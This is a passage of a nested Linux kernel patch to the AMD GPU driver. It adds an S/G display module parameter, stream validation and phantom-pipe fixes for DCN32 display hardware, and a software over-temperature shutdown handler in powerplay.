++	switch (amdgpu_sg_display) {
++	case -1:
++		break;
++	case 0:
++		return false;
++	case 1:
++		return true;
++	default:
++		return false;
++	}
++	if ((totalram_pages() << (PAGE_SHIFT - 10)) +
++	    (adev->gmc.real_vram_size / 1024) >= 64000000) {
++		DRM_WARN("Disabling S/G due to >=64GB RAM\n");
++		return false;
++	}
++	return true;
++}
++
+ /*
+  * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
+  * speed switching. Until we have confirmation from Intel that a specific host
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 49a023f59b2fc..6e5bc74846952 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -185,6 +185,7 @@ int amdgpu_num_kcq = -1;
+ int amdgpu_smartshift_bias;
+ int amdgpu_use_xgmi_p2p = 1;
+ int amdgpu_vcnfw_log;
++int amdgpu_sg_display = -1; /* auto */
+ 
+ static void amdgpu_drv_delayed_reset_work_handler(struct work_struct *work);
+ 
+@@ -929,6 +930,16 @@ module_param_named(num_kcq, amdgpu_num_kcq, int, 0444);
+ MODULE_PARM_DESC(vcnfw_log, "Enable vcnfw log(0 = disable (default value), 1 = enable)");
+ module_param_named(vcnfw_log, amdgpu_vcnfw_log, int, 0444);
+ 
++/**
++ * DOC: sg_display (int)
++ * Disable S/G (scatter/gather) display (i.e., display from system memory).
++ * This option is only relevant on APUs.  Set this option to 0 to disable
++ * S/G display if you experience flickering or other issues under memory
++ * pressure and report the issue.
++ */
++MODULE_PARM_DESC(sg_display, "S/G Display (-1 = auto (default), 0 = disable)");
++module_param_named(sg_display, amdgpu_sg_display, int, 0444);
++
+ /**
+  * DOC: smu_pptable_id (int)
+  * Used to override pptable id. id = 0 use VBIOS pptable.
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 86e07cc1d3dcc..9f718b98da1f7 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1634,6 +1634,8 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 		}
+ 		break;
+ 	}
++	if (init_data.flags.gpu_vm_support)
++		init_data.flags.gpu_vm_support = amdgpu_sg_display_supported(adev);
+ 
+ 	if (init_data.flags.gpu_vm_support)
+ 		adev->mode_info.gpu_vm_support = true;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 8f9c60ed6f8b8..674ab6d9b31e4 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1079,6 +1079,7 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 	struct dc_state *dangling_context = dc_create_state(dc);
+ 	struct dc_state *current_ctx;
+ 	struct pipe_ctx *pipe;
++	struct timing_generator *tg;
+ 
+ 	if (dangling_context == NULL)
+ 		return;
+@@ -1122,6 +1123,7 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 
+ 		if (should_disable && old_stream) {
+ 			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++			tg = pipe->stream_res.tg;
+ 			/* When disabling plane for a phantom pipe, we must turn on the
+ 			 * phantom OTG so the disable programming gets the double buffer
+ 			 * update. Otherwise the pipe will be left in a partially disabled
+@@ -1129,7 +1131,8 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 			 * again for different use.
+ 			 */
+ 			if (old_stream->mall_stream_config.type == SUBVP_PHANTOM) {
+-				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
++				if (tg->funcs->enable_crtc)
++					tg->funcs->enable_crtc(tg);
+ 			}
+ 			dc_rem_all_planes_for_stream(dc, old_stream, dangling_context);
+ 			disable_all_writeback_pipes_for_stream(dc, old_stream, dangling_context);
+@@ -1146,6 +1149,15 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 				dc->hwss.interdependent_update_lock(dc, dc->current_state, false);
+ 				dc->hwss.post_unlock_program_front_end(dc, dangling_context);
+ 			}
++			/* We need to put the phantom OTG back into it's default (disabled) state or we
++			 * can get corruption when transition from one SubVP config to a different one.
++			 * The OTG is set to disable on falling edge of VUPDATE so the plane disable
++			 * will still get it's double buffer update.
++			 */
++			if (old_stream->mall_stream_config.type == SUBVP_PHANTOM) {
++				if (tg->funcs->disable_phantom_crtc)
++					tg->funcs->disable_phantom_crtc(tg);
++			}
+ 		}
+ 	}
+ 
+@@ -1942,6 +1954,9 @@ enum dc_status dc_commit_streams(struct dc *dc,
+ 	struct pipe_ctx *pipe;
+ 	bool handle_exit_odm2to1 = false;
+ 
++	if (dc->ctx->dce_environment == DCE_ENV_VIRTUAL_HW)
++		return res;
++
+ 	if (!streams_changed(dc, streams, stream_count))
+ 		return res;
+ 
+@@ -1984,21 +1999,33 @@ enum dc_status dc_commit_streams(struct dc *dc,
+ 
+ 	dc_resource_state_copy_construct_current(dc, context);
+ 
+-	/*
+-	 * Previous validation was perfomred with fast_validation = true and
+-	 * the full DML state required for hardware programming was skipped.
+-	 *
+-	 * Re-validate here to calculate these parameters / watermarks.
+-	 */
+-	res = dc_validate_global_state(dc, context, false);
++	res = dc_validate_with_context(dc, set, stream_count, context, false);
+ 	if (res != DC_OK) {
+-		DC_LOG_ERROR("DC commit global validation failure: %s (%d)",
+-			     dc_status_to_str(res), res);
+-		return res;
++		BREAK_TO_DEBUGGER();
++		goto fail;
+ 	}
+ 
+ 	res = dc_commit_state_no_check(dc, context);
+ 
++	for (i = 0; i < stream_count; i++) {
++		for (j = 0; j < context->stream_count; j++) {
++			if (streams[i]->stream_id == context->streams[j]->stream_id)
++				streams[i]->out.otg_offset = context->stream_status[j].primary_otg_inst;
++
++			if (dc_is_embedded_signal(streams[i]->signal)) {
++				struct dc_stream_status *status = dc_stream_get_status_from_state(context, streams[i]);
++
++				if (dc->hwss.is_abm_supported)
++					status->is_abm_supported = dc->hwss.is_abm_supported(dc, context, streams[i]);
++				else
++					status->is_abm_supported = true;
++			}
++		}
++	}
++
++fail:
++	dc_release_state(context);
++
+ context_alloc_fail:
+ 
+ 	DC_LOG_DC("%s Finished.\n", __func__);
+@@ -3122,6 +3149,19 @@ static bool update_planes_and_stream_state(struct dc *dc,
+ 
+ 	if (update_type == UPDATE_TYPE_FULL) {
+ 		if (!dc->res_pool->funcs->validate_bandwidth(dc, context, false)) {
++			/* For phantom pipes we remove and create a new set of phantom pipes
++			 * for each full update (because we don't know if we'll need phantom
++			 * pipes until after the first round of validation). However, if validation
++			 * fails we need to keep the existing phantom pipes (because we don't update
++			 * the dc->current_state).
++			 *
++			 * The phantom stream/plane refcount is decremented for validation because
++			 * we assume it'll be removed (the free comes when the dc_state is freed),
++			 * but if validation fails we have to increment back the refcount so it's
++			 * consistent.
++			 */
++			if (dc->res_pool->funcs->retain_phantom_pipes)
++				dc->res_pool->funcs->retain_phantom_pipes(dc, dc->current_state);
+ 			BREAK_TO_DEBUGGER();
+ 			goto fail;
+ 		}
+@@ -3987,6 +4027,18 @@ void dc_commit_updates_for_stream(struct dc *dc,
+ 	struct dc_context *dc_ctx = dc->ctx;
+ 	int i, j;
+ 
++	/* TODO: Since change commit sequence can have a huge impact,
++	 * we decided to only enable it for DCN3x. However, as soon as
++	 * we get more confident about this change we'll need to enable
++	 * the new sequence for all ASICs.
++	 */
++	if (dc->ctx->dce_version >= DCN_VERSION_3_2) {
++		dc_update_planes_and_stream(dc, srf_updates,
++					    surface_count, stream,
++					    stream_update);
++		return;
++	}
++
+ 	stream_status = dc_stream_get_status(stream);
+ 	context = dc->current_state;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index c2c6c4587a5ce..bbaeb6c567d0d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1141,6 +1141,11 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 					(link->dpcd_caps.dongle_type !=
+ 							DISPLAY_DONGLE_DP_HDMI_CONVERTER))
+ 				converter_disable_audio = true;
++
++			/* limited link rate to HBR3 for DPIA until we implement USB4 V2 */
++			if (link->ep_type == DISPLAY_ENDPOINT_USB4_DPIA &&
++					link->reported_link_cap.link_rate > LINK_RATE_HIGH3)
++				link->reported_link_cap.link_rate = LINK_RATE_HIGH3;
+ 			break;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index a26e52abc9898..66923f51037a3 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -2616,15 +2616,241 @@ bool dc_resource_is_dsc_encoding_supported(const struct dc *dc)
+ 	return dc->res_pool->res_cap->num_dsc > 0;
+ }
+ 
++static bool planes_changed_for_existing_stream(struct dc_state *context,
++					       struct dc_stream_state *stream,
++					       const struct dc_validation_set set[],
++					       int set_count)
++{
++	int i, j;
++	struct dc_stream_status *stream_status = NULL;
++
++	for (i = 0; i < context->stream_count; i++) {
++		if (context->streams[i] == stream) {
++			stream_status = &context->stream_status[i];
++			break;
++		}
++	}
++
++	if (!stream_status)
++		ASSERT(0);
++
++	for (i = 0; i < set_count; i++)
++		if (set[i].stream == stream)
++			break;
++
++	if (i == set_count)
++		ASSERT(0);
++
++	if (set[i].plane_count != stream_status->plane_count)
++		return true;
++
++	for (j = 0; j < set[i].plane_count; j++)
++		if (set[i].plane_states[j] != stream_status->plane_states[j])
++			return true;
++
++	return false;
++}
++
++/**
++ * dc_validate_with_context - Validate and update the potential new stream in the context object
++ *
++ * @dc: Used to get the current state status
++ * @set: An array of dc_validation_set with all the current streams reference
++ * @set_count: Total of streams
++ * @context: New context
++ * @fast_validate: Enable or disable fast validation
++ *
++ * This function updates the potential new stream in the context object. It
++ * creates multiple lists for the add, remove, and unchanged streams. In
++ * particular, if the unchanged streams have a plane that changed, it is
++ * necessary to remove all planes from the unchanged streams. In summary, this
++ * function is responsible for validating the new context.
++ *
++ * Return:
++ * In case of success, return DC_OK (1), otherwise, return a DC error.
++ */
++enum dc_status dc_validate_with_context(struct dc *dc,
++					const struct dc_validation_set set[],
++					int set_count,
++					struct dc_state *context,
++					bool fast_validate)
++{
++	struct dc_stream_state *unchanged_streams[MAX_PIPES] = { 0 };
++	struct dc_stream_state *del_streams[MAX_PIPES] = { 0 };
++	struct dc_stream_state *add_streams[MAX_PIPES] = { 0 };
++	int old_stream_count = context->stream_count;
++	enum dc_status res = DC_ERROR_UNEXPECTED;
++	int unchanged_streams_count = 0;
++	int del_streams_count = 0;
++	int add_streams_count = 0;
++	bool found = false;
++	int i, j, k;
++
++	DC_LOGGER_INIT(dc->ctx->logger);
++
++	/* First build a list of streams to be remove from current context */
++	for (i = 0; i < old_stream_count; i++) {
++		struct dc_stream_state *stream = context->streams[i];
++
++		for (j = 0; j < set_count; j++) {
++			if (stream == set[j].stream) {
++				found = true;
++				break;
++			}
++		}
++
++		if (!found)
++			del_streams[del_streams_count++] = stream;
++
++		found = false;
++	}
++
++	/* Second, build a list of new streams */
++	for (i = 0; i < set_count; i++) {
++		struct dc_stream_state *stream = set[i].stream;
++
++		for (j = 0; j < old_stream_count; j++) {
++			if (stream == context->streams[j]) {
++				found = true;
++				break;
++			}
++		}
++
++		if (!found)
++			add_streams[add_streams_count++] = stream;
++
++		found = false;
++	}
++
++	/* Build a list of unchanged streams which is necessary for handling
++	 * planes change such as added, removed, and updated.
++	 */
++	for (i = 0; i < set_count; i++) {
++		/* Check if stream is part of the delete list */
++		for (j = 0; j < del_streams_count; j++) {
++			if (set[i].stream == del_streams[j]) {
++				found = true;
++				break;
++			}
++		}
++
++		if (!found) {
++			/* Check if stream is part of the add list */
++			for (j = 0; j < add_streams_count; j++) {
++				if (set[i].stream == add_streams[j]) {
++					found = true;
++					break;
++				}
++			}
++		}
++
++		if (!found)
++			unchanged_streams[unchanged_streams_count++] = set[i].stream;
++
++		found = false;
++	}
++
++	/* Remove all planes for unchanged streams if planes changed */
++	for (i = 0; i < unchanged_streams_count; i++) {
++		if (planes_changed_for_existing_stream(context,
++						       unchanged_streams[i],
++						       set,
++						       set_count)) {
++			if (!dc_rem_all_planes_for_stream(dc,
++							  unchanged_streams[i],
++							  context)) {
++				res = DC_FAIL_DETACH_SURFACES;
++				goto fail;
++			}
++		}
++	}
++
++	/* Remove all planes for removed streams and then remove the streams */
++	for (i = 0; i < del_streams_count; i++) {
++		/* Need to cpy the dwb data from the old stream in order to efc to work */
++		if (del_streams[i]->num_wb_info > 0) {
++			for (j = 0; j < add_streams_count; j++) {
++				if (del_streams[i]->sink == add_streams[j]->sink) {
++					add_streams[j]->num_wb_info = del_streams[i]->num_wb_info;
++					for (k = 0; k < del_streams[i]->num_wb_info; k++)
++						add_streams[j]->writeback_info[k] = del_streams[i]->writeback_info[k];
++				}
++			}
++		}
++
++		if (!dc_rem_all_planes_for_stream(dc, del_streams[i], context)) {
++			res = DC_FAIL_DETACH_SURFACES;
++			goto fail;
++		}
++
++		res = dc_remove_stream_from_ctx(dc, context, del_streams[i]);
++		if (res != DC_OK)
++			goto fail;
++	}
++
++	/* Swap seamless boot stream to pipe 0 (if needed) to ensure pipe_ctx
++	 * matches. This may change in the future if seamless_boot_stream can be
++	 * multiple.
++	 */
++	for (i = 0; i < add_streams_count; i++) {
++		mark_seamless_boot_stream(dc, add_streams[i]);
++		if (add_streams[i]->apply_seamless_boot_optimization && i != 0) {
++			struct dc_stream_state *temp = add_streams[0];
++
++			add_streams[0] = add_streams[i];
++			add_streams[i] = temp;
++			break;
++		}
++	}
++
++	/* Add new streams and then add all planes for the new stream */
++	for (i = 0; i < add_streams_count; i++) {
++		calculate_phy_pix_clks(add_streams[i]);
++		res = dc_add_stream_to_ctx(dc, context, add_streams[i]);
++		if (res != DC_OK)
++			goto fail;
++
++		if (!add_all_planes_for_stream(dc, add_streams[i], set, set_count, context)) {
++			res = DC_FAIL_ATTACH_SURFACES;
++			goto fail;
++		}
++	}
++
++	/* Add all planes for unchanged streams if planes changed */
++	for (i = 0; i < unchanged_streams_count; i++) {
++		if (planes_changed_for_existing_stream(context,
++						       unchanged_streams[i],
++						       set,
++						       set_count)) {
++			if (!add_all_planes_for_stream(dc, unchanged_streams[i], set, set_count, context)) {
++				res = DC_FAIL_ATTACH_SURFACES;
++				goto fail;
++			}
++		}
++	}
++
++	res = dc_validate_global_state(dc, context, fast_validate);
++
++fail:
++	if (res != DC_OK)
++		DC_LOG_WARNING("%s:resource validation failed, dc_status:%d\n",
++			       __func__,
++			       res);
++
++	return res;
++}
+ 
+ /**
+- * dc_validate_global_state() - Determine if HW can support a given state
+- * Checks HW resource availability and bandwidth requirement.
++ * dc_validate_global_state() - Determine if hardware can support a given state
++ *
+  * @dc: dc struct for this driver
+  * @new_ctx: state to be validated
+  * @fast_validate: set to true if only yes/no to support matters
+  *
+- * Return: DC_OK if the result can be programmed.  Otherwise, an error code.
++ * Checks hardware resource availability and bandwidth requirement.
++ *
++ * Return:
++ * DC_OK if the result can be programmed. Otherwise, an error code.
+  */
+ enum dc_status dc_validate_global_state(
+ 		struct dc *dc,
+@@ -3757,4 +3983,4 @@ bool dc_resource_acquire_secondary_pipe_for_mpc_odm(
+ 	}
+ 
+ 	return true;
+-}
+\ No newline at end of file
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 6409b8d8ff71e..a4540f83aae59 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -1298,6 +1298,12 @@ enum dc_status dc_validate_plane(struct dc *dc, const struct dc_plane_state *pla
+ 
+ void get_clock_requirements_for_state(struct dc_state *state, struct AsicStateEx *info);
+ 
++enum dc_status dc_validate_with_context(struct dc *dc,
++					const struct dc_validation_set set[],
++					int set_count,
++					struct dc_state *context,
++					bool fast_validate);
++
+ bool dc_set_generic_gpio_for_stereo(bool enable,
+ 		struct gpio_service *gpio_service);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index a6fde27d13479..3940271189632 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -2284,6 +2284,12 @@ void dcn10_enable_timing_synchronization(
+ 		opp = grouped_pipes[i]->stream_res.opp;
+ 		tg = grouped_pipes[i]->stream_res.tg;
+ 		tg->funcs->get_otg_active_size(tg, &width, &height);
++
++		if (!tg->funcs->is_tg_enabled(tg)) {
++			DC_SYNC_INFO("Skipping timing sync on disabled OTG\n");
++			return;
++		}
++
+ 		if (opp->funcs->opp_program_dpg_dimensions)
+ 			opp->funcs->opp_program_dpg_dimensions(opp, width, 2*(height) + 1);
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c
+index e5b7ef7422b83..50dc834046446 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_dpp.c
+@@ -357,8 +357,11 @@ void dpp3_set_cursor_attributes(
+ 	int cur_rom_en = 0;
+ 
+ 	if (color_format == CURSOR_MODE_COLOR_PRE_MULTIPLIED_ALPHA ||
+-		color_format == CURSOR_MODE_COLOR_UN_PRE_MULTIPLIED_ALPHA)
+-		cur_rom_en = 1;
++		color_format == CURSOR_MODE_COLOR_UN_PRE_MULTIPLIED_ALPHA) {
++		if (cursor_attributes->attribute_flags.bits.ENABLE_CURSOR_DEGAMMA) {
++			cur_rom_en = 1;
++		}
++	}
+ 
+ 	REG_UPDATE_3(CURSOR0_CONTROL,
+ 			CUR0_MODE, color_format,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+index fe941b103de81..a974f86e718a8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_optc.c
+@@ -167,6 +167,13 @@ static void optc32_phantom_crtc_post_enable(struct timing_generator *optc)
+ 	REG_WAIT(OTG_CLOCK_CONTROL, OTG_BUSY, 0, 1, 100000);
+ }
+ 
++static void optc32_disable_phantom_otg(struct timing_generator *optc)
++{
++	struct optc *optc1 = DCN10TG_FROM_TG(optc);
++
++	REG_UPDATE(OTG_CONTROL, OTG_MASTER_EN, 0);
++}
++
+ static void optc32_set_odm_bypass(struct timing_generator *optc,
+ 		const struct dc_crtc_timing *dc_crtc_timing)
+ {
+@@ -260,6 +267,7 @@ static struct timing_generator_funcs dcn32_tg_funcs = {
+ 		.enable_crtc = optc32_enable_crtc,
+ 		.disable_crtc = optc32_disable_crtc,
+ 		.phantom_crtc_post_enable = optc32_phantom_crtc_post_enable,
++		.disable_phantom_crtc = optc32_disable_phantom_otg,
+ 		/* used by enable_timing_synchronization. Not need for FPGA */
+ 		.is_counter_moving = optc1_is_counter_moving,
+ 		.get_position = optc1_get_position,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 814620e6638fd..2b8700b291a45 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1719,6 +1719,27 @@ static struct dc_stream_state *dcn32_enable_phantom_stream(struct dc *dc,
+ 	return phantom_stream;
+ }
+ 
++void dcn32_retain_phantom_pipes(struct dc *dc, struct dc_state *context)
++{
++	int i;
++	struct dc_plane_state *phantom_plane = NULL;
++	struct dc_stream_state *phantom_stream = NULL;
++
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &context->res_ctx.pipe_ctx[i];
++
++		if (!pipe->top_pipe && !pipe->prev_odm_pipe &&
++				pipe->plane_state && pipe->stream &&
++				pipe->stream->mall_stream_config.type == SUBVP_PHANTOM) {
++			phantom_plane = pipe->plane_state;
++			phantom_stream = pipe->stream;
++
++			dc_plane_state_retain(phantom_plane);
++			dc_stream_retain(phantom_stream);
++		}
++	}
++}
++
+ // return true if removed piped from ctx, false otherwise
+ bool dcn32_remove_phantom_pipes(struct dc *dc, struct dc_state *context)
+ {
+@@ -2035,6 +2056,7 @@ static struct resource_funcs dcn32_res_pool_funcs = {
+ 	.update_soc_for_wm_a = dcn30_update_soc_for_wm_a,
+ 	.add_phantom_pipes = dcn32_add_phantom_pipes,
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
++	.retain_phantom_pipes = dcn32_retain_phantom_pipes,
+ };
+ 
+ static uint32_t read_pipe_fuses(struct dc_context *ctx)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+index 615244a1f95d5..026cf13d203fc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.h
+@@ -83,6 +83,9 @@ bool dcn32_release_post_bldn_3dlut(
+ bool dcn32_remove_phantom_pipes(struct dc *dc,
+ 		struct dc_state *context);
+ 
++void dcn32_retain_phantom_pipes(struct dc *dc,
++		struct dc_state *context);
++
+ void dcn32_add_phantom_pipes(struct dc *dc,
+ 		struct dc_state *context,
+ 		display_e2e_pipe_params_st *pipes,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+index 213ff3672bd54..aed92ced7b762 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn321/dcn321_resource.c
+@@ -1619,6 +1619,7 @@ static struct resource_funcs dcn321_res_pool_funcs = {
+ 	.update_soc_for_wm_a = dcn30_update_soc_for_wm_a,
+ 	.add_phantom_pipes = dcn32_add_phantom_pipes,
+ 	.remove_phantom_pipes = dcn32_remove_phantom_pipes,
++	.retain_phantom_pipes = dcn32_retain_phantom_pipes,
+ };
+ 
+ static uint32_t read_pipe_fuses(struct dc_context *ctx)
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/core_types.h b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+index 9498105c98ab3..5fa7c4772af4f 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/core_types.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/core_types.h
+@@ -234,6 +234,7 @@ struct resource_funcs {
+             unsigned int index);
+ 
+ 	bool (*remove_phantom_pipes)(struct dc *dc, struct dc_state *context);
++	void (*retain_phantom_pipes)(struct dc *dc, struct dc_state *context);
+ 	void (*get_panel_config_defaults)(struct dc_panel_config *panel_config);
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+index f96fb425345e4..789cf9406ca5b 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+@@ -185,6 +185,7 @@ struct timing_generator_funcs {
+ #ifdef CONFIG_DRM_AMD_DC_DCN
+ 	void (*phantom_crtc_post_enable)(struct timing_generator *tg);
+ #endif
++	void (*disable_phantom_crtc)(struct timing_generator *tg);
+ 	bool (*immediate_disable_crtc)(struct timing_generator *tg);
+ 	bool (*is_counter_moving)(struct timing_generator *tg);
+ 	void (*get_position)(struct timing_generator *tg,
+diff --git a/drivers/gpu/drm/amd/include/kgd_pp_interface.h b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+index d18162e9ed1da..f3d64c78feaa8 100644
+--- a/drivers/gpu/drm/amd/include/kgd_pp_interface.h
++++ b/drivers/gpu/drm/amd/include/kgd_pp_interface.h
+@@ -139,6 +139,8 @@ enum amd_pp_sensors {
+ 	AMDGPU_PP_SENSOR_MIN_FAN_RPM,
+ 	AMDGPU_PP_SENSOR_MAX_FAN_RPM,
+ 	AMDGPU_PP_SENSOR_VCN_POWER_STATE,
++	AMDGPU_PP_SENSOR_PEAK_PSTATE_SCLK,
++	AMDGPU_PP_SENSOR_PEAK_PSTATE_MCLK,
+ };
+ 
+ enum amd_pp_task {
+diff --git a/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h b/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h
+index cb5b9df78b4db..338fce249f5ab 100644
+--- a/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h
++++ b/drivers/gpu/drm/amd/pm/inc/amdgpu_dpm.h
+@@ -89,6 +89,8 @@ struct amdgpu_dpm_thermal {
+ 	int                max_mem_crit_temp;
+ 	/* memory max emergency(shutdown) temp */
+ 	int                max_mem_emergency_temp;
++	/* SWCTF threshold */
++	int                sw_ctf_threshold;
+ 	/* was last interrupt low to high or high to low */
+ 	bool               high_to_low;
+ 	/* interrupt source */
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index 1159ae114dd02..179e1c593a53f 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -26,6 +26,7 @@
+ #include <linux/gfp.h>
+ #include <linux/slab.h>
+ #include <linux/firmware.h>
++#include <linux/reboot.h>
+ #include "amd_shared.h"
+ #include "amd_powerplay.h"
+ #include "power_state.h"
+@@ -91,6 +92,45 @@ static int pp_early_init(void *handle)
+ 	return 0;
+ }
+ 
++static void pp_swctf_delayed_work_handler(struct work_struct *work)
++{
++	struct pp_hwmgr *hwmgr =
++		container_of(work, struct pp_hwmgr, swctf_delayed_work.work);
++	struct amdgpu_device *adev = hwmgr->adev;
++	struct amdgpu_dpm_thermal *range =
++				&adev->pm.dpm.thermal;
++	uint32_t gpu_temperature, size;
++	int ret;
++
++	/*
++	 * If the hotspot/edge temperature is confirmed as below SW CTF setting point
++	 * after the delay enforced, nothing will be done.
++	 * Otherwise, a graceful shutdown will be performed to prevent further damage.
++	 */
++	if (range->sw_ctf_threshold &&
++	    hwmgr->hwmgr_func->read_sensor) {
++		ret = hwmgr->hwmgr_func->read_sensor(hwmgr,
++						     AMDGPU_PP_SENSOR_HOTSPOT_TEMP,
++						     &gpu_temperature,
++						     &size);
++		/*
++		 * For some legacy ASICs, hotspot temperature retrieving might be not
++		 * supported. Check the edge temperature instead then.
++		 */
++		if (ret == -EOPNOTSUPP)
++			ret = hwmgr->hwmgr_func->read_sensor(hwmgr,
++							     AMDGPU_PP_SENSOR_EDGE_TEMP,
++							     &gpu_temperature,
++							     &size);
++		if (!ret && gpu_temperature / 1000 < range->sw_ctf_threshold)
++			return;
++	}
++
++	dev_emerg(adev->dev, "ERROR: GPU over temperature range(SW CTF) detected!\n");
++	dev_emerg(adev->dev, "ERROR: System is going to shutdown due to GPU SW CTF!\n");
++	orderly_poweroff(true);
++}
++
+ static int pp_sw_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = handle;
+@@ -101,6 +141,10 @@ static int pp_sw_init(void *handle)
+ 
+ 	pr_debug("powerplay sw init %s\n", ret ? "failed" : "successfully");
+ 
++	if (!ret)
++		INIT_DELAYED_WORK(&hwmgr->swctf_delayed_work,
++				  pp_swctf_delayed_work_handler);
++
+ 	return ret;
+ }
+ 
+@@ -136,6 +180,8 @@ static int pp_hw_fini(void *handle)
+ 	struct amdgpu_device *adev = handle;
+ 	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+ 
++	cancel_delayed_work_sync(&hwmgr->swctf_delayed_work);
++
+ 	hwmgr_hw_fini(hwmgr);
+ 
+ 	return 0;
+@@ -222,6 +268,8 @@ static int pp_suspend(void *handle)
+ 	struct amdgpu_device *adev = handle;
+ 	struct pp_hwmgr *hwmgr = adev->powerplay.pp_handle;
+ 
++	cancel_delayed_work_sync(&hwmgr->swctf_delayed_work);
++
+ 	return hwmgr_suspend(hwmgr);
+ }
+ 
+@@ -769,10 +817,16 @@ static int pp_dpm_read_sensor(void *handle, int idx,
+ 
+ 	switch (idx) {
+ 	case AMDGPU_PP_SENSOR_STABLE_PSTATE_SCLK:
+-		*((uint32_t *)value) = hwmgr->pstate_sclk;
++		*((uint32_t *)value) = hwmgr->pstate_sclk * 100;
+ 		return 0;
+ 	case AMDGPU_PP_SENSOR_STABLE_PSTATE_MCLK:
+-		*((uint32_t *)value) = hwmgr->pstate_mclk;
++		*((uint32_t *)value) = hwmgr->pstate_mclk * 100;
++		return 0;
++	case AMDGPU_PP_SENSOR_PEAK_PSTATE_SCLK:
++		*((uint32_t *)value) = hwmgr->pstate_sclk_peak * 100;
++		return 0;
